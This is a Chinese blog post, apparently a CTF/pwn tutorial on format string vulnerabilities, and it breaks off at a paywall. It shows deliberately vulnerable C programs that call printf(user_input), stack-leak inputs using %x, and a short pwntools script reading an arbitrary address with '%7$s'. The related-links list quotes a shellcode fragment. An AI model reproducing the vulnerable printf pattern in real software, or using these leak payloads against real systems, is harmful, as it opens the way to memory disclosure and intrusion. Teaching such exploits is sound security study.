格式化字符串漏洞利用

最新推荐文章于 2024-05-28 15:44:18 发布
最新推荐文章于 2024-05-28 15:44:18 发布
阅读量3.8k 收藏 18
点赞数 3
分类专栏: pwn基础 文章标签: 格式化字符串漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/83376235
版权

学习资料:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/                        https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#more

具体的基础的学习知识点,上面两个链接应该都有

先粗略讲一下格式化字符串漏洞有哪些危害吧

#include <stdio.h>

int main(void)
{
	char a[100];
	scanf("%s",a);
	printf(a);
	return 0;
}

这程序我们输入AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x

输出:AAAA1,d1f77790,a,0,d217f700,41414141,78252c78,252c7825,2c78252c,78252c78,6f736476

可以看到栈的地址被我们泄露了,是不是有点迷,换个例子看一下

#include <stdio.h>
int main() {
  char s[100];
  int a = 1, b = 0x22222222, c = -1;
  scanf("%s", s);
  printf("%08x.%08x.%08x.%s\n", a, b, c, s);
  printf(s);
  return 0;
}

我们先正经的输入字符串,结果如下,好像没什么问题

换个输入看看

是不是惊呆了,其实原理和上一个例子是一样的,就是利用printf是可变参数的函数,被调用者无法知道在函数调用之前到底有多少参数被压入栈帧当中

当然以上只是泄露,我们同时还是实现实现任意地址读

这里我们要了解printf函数的另一个操作m$

具体是啥可以给个链接:https://blog.csdn.net/ai_book/article/details/17881939

总之输出参数列表中的第m个参数,拿第一个例子继续做实验

可以看到字符串AAAA的据开头的偏移量为6,知道偏移量之后,我们试着把elf文件的开头信息读出来

exp

from pwn import *

context.log_level = 'debug'

cn = process('./test2')
cn.sendline("%7$s"+p64(0x08048000))
print cn.recv()

结果如下

我们首先知道了%7$s这个字符串会被放在%6$s,然后

最低0.47元/天 解锁文章
xiaoyuyulala
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fsef:格式化字符串漏洞利用框架(是否继续!)
05-07
使用此脚本可以轻松生成和利用格式字符串。 #!/usr/bin/python # coding=utf-8 from fsef import RemoteFsef shellcode = " \x1c \xa8 \x04 \x08 \x6a \x31 \x58 \x99 \xcd \x80 \x89 \xc3 \x89 \xc1 \x6a \x46 " ...
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2433
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
CTF| 格式化字符串漏洞
最新发布
2401_84466227的博客
05-28 1046
printf("格式化字符串",参数...)该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用什么格式输出内容。格式化说明符:%d - 十进制 - 输出十进制整数%s - 字符串 - 从内存中读取字符串%x - 十六进制 - 输出十六进制数%c - 字符 - 输出字符%p - 指针 - 指针地址%n - 到目前为止所写的字符数例如:return 0;调用以后会显示:特别要注意的是%n这个格式化字符串,它的功能是将%n。
好好说话之格式化字符串漏洞利用
hollk’s blog
08-05 3208
编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 一、格式化字符串漏洞利用 格式化字符串漏洞两大利用手段: 是程序崩溃,因为%s对应的参数地址不合法的概率比较大 查看进程内容,根据%d,%f输出了栈上的内容 二、程序崩溃 一般输入若干个%s即可 %s%s%s%s%s%s%s%s%s%s%s%s%s%s 栈上不可能每个值都对应了合法地址,总会有某个地址可以使得程序崩溃,不能控制,但是可以玩坏。例如,如果远程服务有个格式化字符串漏洞,那么就可以攻击其可用性,使服务崩溃,进而使
格式化字符串漏洞利用 六、特殊案例
热门推荐
龙哥盟
04-14 3万+
六、特殊案例 原文:Exploiting Format String Vulnerabilities 作者:scut@team-teso.net 译者:飞龙 日期:2001.9.1 版本:v1.2 有一些可以利用的特定场景,不需要了解所有偏移,或者你可以使利用更加简单,直接,最重要的是:可靠。这里我列出了一些利用格式化字符串漏洞的常见方法。6.1 替代目标
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
WdIg-2023的博客
04-09 2913
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
格式化字符串漏洞
weixin_62675330的博客
02-13 5605
格式化字符串漏洞 初学pwn,学到了格式化字符串漏洞,总结一下。 格式化字符串函数:格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。 漏洞printf(s) 用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f” 然后 printf 函数会根据这个格式化字符串来解析对应的其他参数 %d - 十进制 - 输出十进制整数 %s - 字符串 - 从内存中读取字符串 %x - 十六进制 - 输出十六进制数 %c -
windows平台下的格式化字符串漏洞利用技术[整理].pdf
10-12
《Windows平台下的格式化字符串漏洞利用技术》 格式化字符串漏洞是C语言编程中的一种安全问题,源于对用户输入的格式化字符串处理不当。在Windows平台上,这种漏洞可能导致程序崩溃或者执行恶意代码,严重威胁系统...
Windows格式化字符串漏洞利用[汇编].pdf
10-12
Windows格式化字符串漏洞利用[汇编].pdf
格式化字符串漏洞实验例子(一)easy
谭宇
03-10 634
1、goodluck 例子出处github,点击访问 checksec查防 root@user-virtual-machine:/mnt/hgfs/CTF/share/goodluck# checksec goodluck [*] '/mnt/hgfs/CTF/share/goodluck/goodluck' Arch: amd64-64-little RELRO:...
格式化字符串漏洞讲解及实例爆破
yajuanpi4899的博客
12-01 1282
格式化字符串漏洞两种方式: 1)泄露所指向的代码,读取指针本身的地址数据(%p) 2)泄露地址所指向的数值,指针指向的数据(%s)---1.泄露栈上存放地址 字符串在栈中存放的是其地址,数据不直接存于栈中,所以直接进行字符串读取时,有下例: 从中可以看出%p和%s的区别 再看字符串存取规则: 一般存放字符串时: 如图所示,字符串以 X00 标志位进行结尾,当读取至结尾时便能中断。存在栈中的指针是字符串的头部指针。 根据如上原理,构建简单攻击: 当我们直接...
CTF-PWN笔记(二)-- 格式化字符串漏洞
CK_0ff的博客
01-27 1246
文章目录漏洞介绍格式化字符串的格式漏洞原理及利用例题 漏洞介绍 格式化字符串(英语:format string)是一些程序设计语言的输入/输出库中能将字符串参数转换为另一种形式输出的函数。例如C、C++等程序设计语言的printf类函数,其中的转换说明(conversion specification)用于把随后对应的0个或多个函数参数转换为相应的格式输出;格式化字符串中转换说明以外的其它字符原样输出。 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。 通俗来
格式化字符串漏洞_【漏洞预警】关于思科CDP设备多个安全漏洞情况的通报
weixin_39836898的博客
12-09 200
近日,国家信息安全漏洞库(CNNVD)收到关于思科CDP设备多个安全漏洞情况的报送,包括思科视频监控8000系列IP摄像头CDP远程代码执行漏洞(CNNVD-202002-127、CVE-2020-3110)、思科VoIP电话CDP远程代码执行漏洞(CNNVD-202002-128、CVE-2020-3111)等多个漏洞。成功利用这些漏洞的攻击者,可以远程执行任意代码,获取系统权限。思科Fire...
初步学习CTF格式化字符串漏洞(待更新)
哔...的博客
03-25 949
初步学习CTF格式化字符串漏洞(待更新) 文章目录初步学习CTF格式化字符串漏洞(待更新)格式化字符串漏洞原理利用格式化字符串进行任意地址读利用格式化字符串进行任意地址写 https://veritas501.space/2017/04/28/格式化字符串漏洞学习/ 先 List item 看看例子 int main() { char s[60]; char v6 FILE* s...
好好说话之64位格式化字符串漏洞
hollk’s blog
08-06 2861
64位格式化字符串和32位的很相似,做题的步骤也相同,唯一不同的是64位程序对函数参数存储的方式和32位的不同。64为程序会优先将函数的前6个参数放置在寄存器中,超过6个的再存放在栈上,而32位直接存放在栈上。寄存器存放顺序可以看我之前写的好好说话之ret2csu 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 例题选自2017-UIUCTF-pwn200-GoodLuck checksec搞一下 64位程序,开启了NX保护、Canary。因为我们知道这是一道格式化字符串的题
【软件与系统安全】整数溢出、格式化字符串、数组越界访问漏洞
kkzzjx
05-20 1393
文章目录一、整数溢出整数表示举例防护二、格式化字符串漏洞三、数组越界访问漏洞产生举例 一、整数溢出 整数表示 原码、反码、补码表示: 对于正数原码、反码以及补码是其本身。负数的原码是其本身,反码是对原码除符号位之外的各位取反,补码则是反码加1。 CF是无符号溢出标志,OF是有符号溢出标志。即使有符号数相加/相减导致了CF=1也没什么意义,不能说明结果的正确与否。此时,OF=1,则说明结果溢出,出现错误;OF=0,说明结果正确。这个过程根本和CF没关系,CF=1/0,都不会影响。 这说明指针类型不同,对
Windows堆溢出与格式化字符串漏洞利用深度解析
本文将深入探讨Windows平台下的两种关键漏洞利用技术:堆溢出和格式化字符串漏洞。堆溢出是针对内存管理中的缺陷,特别是当程序动态分配的堆内存超出其预期大小时,可能导致数据溢出到相邻的内存区域。作者强调,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值